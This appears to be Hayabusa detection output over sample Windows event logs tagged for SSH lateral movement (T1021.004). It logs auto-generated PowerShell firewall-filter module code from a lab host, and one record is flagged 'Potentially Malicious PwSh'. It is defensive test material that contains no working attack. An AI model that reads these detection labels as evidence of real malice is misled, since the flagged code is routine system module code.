SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.436 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 